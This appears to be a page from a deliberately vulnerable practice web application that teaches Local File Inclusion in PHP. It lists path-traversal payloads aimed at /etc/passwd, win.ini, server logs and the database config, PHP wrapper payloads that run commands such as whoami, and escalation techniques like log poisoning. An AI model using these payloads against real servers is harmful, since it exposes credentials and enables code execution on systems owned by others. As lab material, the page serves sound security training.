โ† Back to Dashboard

Page Viewer

Select a page to view:

Home About Contact

Page Content:

Including: pages/contact.php


๐Ÿ“ง Contact Page

Contact us at: admin@vulnlab.local

๐ŸŽฏ Vulnerability Info

Type: Local File Inclusion (LFI)

Severity: Critical

๐Ÿ’ก How to Exploit

  • User input directly passed to include()
  • Can include arbitrary PHP files
  • PHP wrappers can be used for advanced attacks
  • Can lead to Remote Code Execution

๐Ÿงช Basic LFI Payloads

../../../Windows/win.ini%00 ../../config/db ....//....//....//etc/passwd%00 ../../../xampp/apache/logs/access.log ../../../xampp/apache/logs/error.log

๐Ÿงช PHP Wrapper Payloads

php://filter/convert.base64-encode/resource=../../../config/db php://filter/read=string.rot13/resource=home php://input (POST body: <?php system('whoami'); ?>) data://text/plain,<?php phpinfo(); ?> expect://whoami

๐Ÿ“ Advanced Techniques

  • Log Poisoning: Inject PHP in logs, then include
  • Session File: Include PHP session files
  • /proc/self/environ: User-Agent injection (Linux)
  • Null byte: Bypass .php extension

๐Ÿ”ง Try This

Read the database config:

?page=../../config/db